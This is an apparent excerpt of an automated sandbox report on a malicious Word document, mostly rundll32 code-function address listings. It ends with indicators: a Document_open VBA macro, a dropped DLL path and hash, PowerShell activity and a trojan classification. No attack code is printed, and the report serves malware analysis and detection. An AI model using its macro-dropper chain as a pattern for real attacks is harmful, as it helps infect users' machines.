Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 8_2_00425AB8	8_2_00425AB8
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 8_2_0041CB42	8_2_0041CB42
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 8_2_00426B45	8_2_00426B45
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 8_2_00413D4E	8_2_00413D4E
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 8_2_00428F65	8_2_00428F65
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 8_2_00422965	8_2_00422965
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 8_2_0042676B	8_2_0042676B
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 8_2_00420F6D	8_2_00420F6D
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 8_2_00427570	8_2_00427570
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 8_2_00421B71	8_2_00421B71
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 8_2_0042DD78	8_2_0042DD78
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 8_2_0041CF11	8_2_0041CF11
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 8_2_00425115	8_2_00425115
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 8_2_0042231B	8_2_0042231B
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 8_2_0042BF25	8_2_0042BF25
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 8_2_0042DB25	8_2_0042DB25
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 8_2_0042D530	8_2_0042D530
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 8_2_0041213E	8_2_0041213E
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 8_2_00416BC0	8_2_00416BC0
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 8_2_004273C0	8_2_004273C0
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 8_2_004277C0	8_2_004277C0
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 8_2_00429DC0	8_2_00429DC0
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 8_2_0042CDCC	8_2_0042CDCC
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 8_2_0041ADCE	8_2_0041ADCE
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 8_2_0042B1D2	8_2_0042B1D2
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 8_2_00414BDE	8_2_00414BDE
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 8_2_00415BE1	8_2_00415BE1
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 8_2_00412DEE	8_2_00412DEE
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 8_2_0042E19F	8_2_0042E19F
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 8_2_004299A4	8_2_004299A4
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 8_2_00425DAA	8_2_00425DAA
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 8_2_0042EDB9	8_2_0042EDB9
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 8_2_0044303C	8_2_0044303C
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 8_2_00451E14	8_2_00451E14
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 8_2_00723856	8_2_00723856
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 8_2_00719055	8_2_00719055
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 8_2_0072C83F	8_2_0072C83F
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 8_2_0072502C	8_2_0072502C
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 8_2_0072C014	8_2_0072C014
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 8_2_007210E5	8_2_007210E5
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 8_2_0071C0B6	8_2_0071C0B6
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 8_2_007210BB	8_2_007210BB
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 8_2_007260B9	8_2_007260B9
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 8_2_0072D099	8_2_0072D099
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 8_2_0072188F	8_2_0072188F
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 8_2_0072A972	8_2_0072A972
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 8_2_00714152	8_2_00714152
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 8_2_00715155	8_2_00715155
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 8_2_00716134	8_2_00716134
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 8_2_00726934	8_2_00726934
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 8_2_0072893D	8_2_0072893D
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 8_2_0071C9C0	8_2_0071C9C0
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 8_2_0071D1A3	8_2_0071D1A3
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 8_2_0072B998	8_2_0072B998
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 8_2_0072E985	8_2_0072E985
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 8_2_00718A60	8_2_00718A60
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 8_2_0071923C	8_2_0071923C
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 8_2_00718217	8_2_00718217
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 8_2_007232F0	8_2_007232F0
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 8_2_007272F1	8_2_007272F1
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 8_2_00726AE4	8_2_00726AE4
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 8_2_0072D2EC	8_2_0072D2EC
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 8_2_00725AC3	8_2_00725AC3
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 8_2_007132C2	8_2_007132C2
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 8_2_00716B79	8_2_00716B79
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 8_2_00712362	8_2_00712362
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 8_2_0072C340	8_2_0072C340
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 8_2_0072E32D	8_2_0072E32D
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 8_2_0072531E	8_2_0072531E
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 8_2_00727BDC	8_2_00727BDC
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 8_2_00710BCC	8_2_00710BCC
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 8_2_007243BF	8_2_007243BF
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 8_2_007173A8	8_2_007173A8
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 8_2_00711B9C	8_2_00711B9C
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 8_2_0071BC63	8_2_0071BC63
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 8_2_0072D45C	8_2_0072D45C
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 8_2_0072BC21	8_2_0072BC21
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 8_2_00714C27	8_2_00714C27
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 8_2_0071542D	8_2_0071542D
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 8_2_00723C07	8_2_00723C07
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 8_2_007204E1	8_2_007204E1
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 8_2_007284D9	8_2_007284D9
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 8_2_00725CDF	8_2_00725CDF
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 8_2_0072B499	8_2_0072B499
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 8_2_0071C485	8_2_0071C485
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 8_2_00726D34	8_2_00726D34
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 8_2_0071B5F1	8_2_0071B5F1
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 8_2_0072B5C0	8_2_0072B5C0
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 8_2_00714DCA	8_2_00714DCA
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 8_2_007185B3	8_2_007185B3
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 8_2_007165BF	8_2_007165BF
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 8_2_00727DA5	8_2_00727DA5
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 8_2_00719DAD	8_2_00719DAD
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 8_2_00719DAE	8_2_00719DAE
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 8_2_0071ED87	8_2_0071ED87
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 8_2_0071C587	8_2_0071C587
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 8_2_00717D8A	8_2_00717D8A
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 8_2_0071C652	8_2_0071C652
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 8_2_00721ED9	8_2_00721ED9
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 8_2_007116B2	8_2_007116B2
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 8_2_00713E9E	8_2_00713E9E
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 8_2_00724689	8_2_00724689
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 8_2_0071577E	8_2_0071577E
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 8_2_00727F6A	8_2_00727F6A
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 8_2_0072A746	8_2_0072A746
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 8_2_0072D713	8_2_0072D713
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 8_2_00728F18	8_2_00728F18
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 8_2_00713F9F	8_2_00713F9F
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 9_2_0019C014	9_2_0019C014
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 9_2_00188217	9_2_00188217
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 9_2_00193C07	9_2_00193C07
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 9_2_0018923C	9_2_0018923C
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 9_2_0019C83F	9_2_0019C83F
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 9_2_0019502C	9_2_0019502C
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 9_2_0018542D	9_2_0018542D
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 9_2_0019BC21	9_2_0019BC21
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 9_2_00184C27	9_2_00184C27
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 9_2_0019D45C	9_2_0019D45C
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 9_2_0018C652	9_2_0018C652
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 9_2_00189055	9_2_00189055
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 9_2_00193856	9_2_00193856
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 9_2_00188A60	9_2_00188A60
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 9_2_0018BC63	9_2_0018BC63
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 9_2_0019B499	9_2_0019B499
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 9_2_0019D099	9_2_0019D099
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 9_2_00183E9E	9_2_00183E9E
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 9_2_00194689	9_2_00194689
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 9_2_0019188F	9_2_0019188F
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 9_2_0018C485	9_2_0018C485
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 9_2_001960B9	9_2_001960B9
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 9_2_001910BB	9_2_001910BB
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 9_2_001816B2	9_2_001816B2
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 9_2_0018C0B6	9_2_0018C0B6
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 9_2_00191ED9	9_2_00191ED9
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 9_2_001984D9	9_2_001984D9
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 9_2_00195CDF	9_2_00195CDF
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 9_2_00195AC3	9_2_00195AC3
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 9_2_001832C2	9_2_001832C2
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 9_2_001972F1	9_2_001972F1
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 9_2_001932F0	9_2_001932F0
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 9_2_0019D2EC	9_2_0019D2EC
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 9_2_001904E1	9_2_001904E1
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 9_2_001910E5	9_2_001910E5
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 9_2_00196AE4	9_2_00196AE4
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 9_2_00198F18	9_2_00198F18
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 9_2_0019531E	9_2_0019531E
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 9_2_0019D713	9_2_0019D713
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 9_2_0019893D	9_2_0019893D
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 9_2_00186134	9_2_00186134
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 9_2_00196D34	9_2_00196D34
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 9_2_00196934	9_2_00196934
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 9_2_0019E32D	9_2_0019E32D
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 9_2_00184152	9_2_00184152
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 9_2_00185155	9_2_00185155
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 9_2_0019C340	9_2_0019C340
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 9_2_0019A746	9_2_0019A746
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 9_2_00186B79	9_2_00186B79
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 9_2_0018577E	9_2_0018577E
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 9_2_0019A972	9_2_0019A972
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 9_2_00197F6A	9_2_00197F6A
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 9_2_00182362	9_2_00182362
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 9_2_0019B998	9_2_0019B998
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 9_2_00181B9C	9_2_00181B9C
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 9_2_00183F9F	9_2_00183F9F
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 9_2_00187D8A	9_2_00187D8A
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 9_2_0019E985	9_2_0019E985
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 9_2_0018ED87	9_2_0018ED87
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 9_2_0018C587	9_2_0018C587
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 9_2_001943BF	9_2_001943BF
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 9_2_001865BF	9_2_001865BF
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 9_2_001885B3	9_2_001885B3
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 9_2_001873A8	9_2_001873A8
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 9_2_00189DAD	9_2_00189DAD
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 9_2_00189DAE	9_2_00189DAE
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 9_2_0018D1A3	9_2_0018D1A3
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 9_2_00197DA5	9_2_00197DA5
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 9_2_00197BDC	9_2_00197BDC
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 9_2_00184DCA	9_2_00184DCA
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 9_2_00180BCC	9_2_00180BCC
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 9_2_0018C9C0	9_2_0018C9C0
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 9_2_0019B5C0	9_2_0019B5C0
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 9_2_0018B5F1	9_2_0018B5F1
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 10_2_003BC83F	10_2_003BC83F
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 10_2_003A923C	10_2_003A923C
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 10_2_003B502C	10_2_003B502C
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 10_2_003A542D	10_2_003A542D
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 10_2_003BBC21	10_2_003BBC21
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 10_2_003A4C27	10_2_003A4C27
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 10_2_003A8217	10_2_003A8217
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 10_2_003BC014	10_2_003BC014
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 10_2_003B3C07	10_2_003B3C07
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 10_2_003ABC63	10_2_003ABC63
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 10_2_003A8A60	10_2_003A8A60
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 10_2_003BD45C	10_2_003BD45C
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 10_2_003AC652	10_2_003AC652
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 10_2_003B3856	10_2_003B3856
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 10_2_003A9055	10_2_003A9055
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 10_2_003B10BB	10_2_003B10BB
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 10_2_003B60B9	10_2_003B60B9
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 10_2_003A16B2	10_2_003A16B2
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 10_2_003AC0B6	10_2_003AC0B6
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 10_2_003BB499	10_2_003BB499
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 10_2_003BD099	10_2_003BD099
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 10_2_003A3E9E	10_2_003A3E9E
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 10_2_003B4689	10_2_003B4689
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 10_2_003B188F	10_2_003B188F
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 10_2_003AC485	10_2_003AC485
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 10_2_003B72F1	10_2_003B72F1
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 10_2_003B32F0	10_2_003B32F0
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 10_2_003BD2EC	10_2_003BD2EC
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 10_2_003B04E1	10_2_003B04E1
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 10_2_003B10E5	10_2_003B10E5
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 10_2_003B6AE4	10_2_003B6AE4
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 10_2_003B1ED9	10_2_003B1ED9
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 10_2_003B84D9	10_2_003B84D9
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 10_2_003B5CDF	10_2_003B5CDF
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 10_2_003B5AC3	10_2_003B5AC3
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 10_2_003A32C2	10_2_003A32C2
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 10_2_003B893D	10_2_003B893D
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 10_2_003A6134	10_2_003A6134
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 10_2_003B6D34	10_2_003B6D34
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 10_2_003B6934	10_2_003B6934
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 10_2_003BE32D	10_2_003BE32D
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 10_2_003B8F18	10_2_003B8F18
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 10_2_003B531E	10_2_003B531E
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 10_2_003BD713	10_2_003BD713
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 10_2_003A6B79	10_2_003A6B79
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 10_2_003A577E	10_2_003A577E
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 10_2_003BA972	10_2_003BA972
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 10_2_003B7F6A	10_2_003B7F6A
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 10_2_003A2362	10_2_003A2362
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 10_2_003A4152	10_2_003A4152
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 10_2_003A5155	10_2_003A5155
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 10_2_003BC340	10_2_003BC340
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 10_2_003BA746	10_2_003BA746
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 10_2_003B43BF	10_2_003B43BF
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 10_2_003A65BF	10_2_003A65BF
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 10_2_003A85B3	10_2_003A85B3
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 10_2_003A73A8	10_2_003A73A8
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 10_2_003A9DAE	10_2_003A9DAE
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 10_2_003A9DAD	10_2_003A9DAD
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 10_2_003AD1A3	10_2_003AD1A3
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 10_2_003B7DA5	10_2_003B7DA5
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 10_2_003BB998	10_2_003BB998
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 10_2_003A3F9F	10_2_003A3F9F
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 10_2_003A1B9C	10_2_003A1B9C
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 10_2_003A7D8A	10_2_003A7D8A
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 10_2_003AED87	10_2_003AED87
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 10_2_003AC587	10_2_003AC587
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 10_2_003BE985	10_2_003BE985
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 10_2_003AB5F1	10_2_003AB5F1
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 10_2_003B7BDC	10_2_003B7BDC
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 10_2_003A4DCA	10_2_003A4DCA
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 10_2_003A0BCC	10_2_003A0BCC
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 10_2_003AC9C0	10_2_003AC9C0
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 10_2_003BB5C0	10_2_003BB5C0
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 11_2_003EC83F	11_2_003EC83F
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 11_2_003D923C	11_2_003D923C
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 11_2_003D542D	11_2_003D542D
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 11_2_003E502C	11_2_003E502C
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 11_2_003D4C27	11_2_003D4C27
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 11_2_003EBC21	11_2_003EBC21
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 11_2_003EC014	11_2_003EC014
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 11_2_003D8217	11_2_003D8217
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 11_2_003E3C07	11_2_003E3C07
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 11_2_003D8A60	11_2_003D8A60
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 11_2_003DBC63	11_2_003DBC63
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 11_2_003ED45C	11_2_003ED45C
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 11_2_003E3856	11_2_003E3856
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 11_2_003D9055	11_2_003D9055
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 11_2_003DC652	11_2_003DC652
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 11_2_003E10BB	11_2_003E10BB
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 11_2_003E60B9	11_2_003E60B9
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 11_2_003DC0B6	11_2_003DC0B6
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 11_2_003D16B2	11_2_003D16B2
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 11_2_003D3E9E	11_2_003D3E9E
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 11_2_003EB499	11_2_003EB499
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 11_2_003ED099	11_2_003ED099
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 11_2_003E188F	11_2_003E188F
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 11_2_003E4689	11_2_003E4689
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 11_2_003DC485	11_2_003DC485
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 11_2_003E32F0	11_2_003E32F0
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 11_2_003E72F1	11_2_003E72F1
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 11_2_003ED2EC	11_2_003ED2EC
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 11_2_003E6AE4	11_2_003E6AE4
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 11_2_003E10E5	11_2_003E10E5
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 11_2_003E04E1	11_2_003E04E1
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 11_2_003E5CDF	11_2_003E5CDF
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 11_2_003E1ED9	11_2_003E1ED9
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 11_2_003E84D9	11_2_003E84D9
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 11_2_003E5AC3	11_2_003E5AC3
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 11_2_003D32C2	11_2_003D32C2
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 11_2_003E893D	11_2_003E893D
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 11_2_003D6134	11_2_003D6134

Source: ARCH_25_012021.doc	OLE, VBA macro line: Private Sub Document_open()
Source: VBA code instrumentation	OLE, VBA macro: Module A5ate73kc6cw5njy, Function Document_open			Name: Document_open

Source: ARCH_25_012021.doc

OLE indicator, VBA macros: true

Source: Joe Sandbox View

Dropped File: C:\Users\user\Kaktksw\An6othh\N49I.dll D09BACE1490F6EE322262FF2DA373E861F3B3B9BC03C386CE8A031648F1EAA4F

Source: N49I.dll.5.dr

Static PE information: Resource name: RT_BITMAP type: GLS_BINARY_LSB_FIRST

Binary or memory string: .VBPud<_

Source: classification engine

Classification label: mal100.troj.evad.winDOC@28/8@1/5

Source: C:\Windows\SysWOW64\rundll32.exe

Code function: 16_2_002834DF CreateToolhelp32Snapshot,

16_2_002834DF

Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE

File created: C:\Users\user\Desktop\~$CH_25_012021.doc

Jump to behavior

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

Mutant created: \Sessions\1\BaseNamedObjects\Global\.net clr networking

Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE

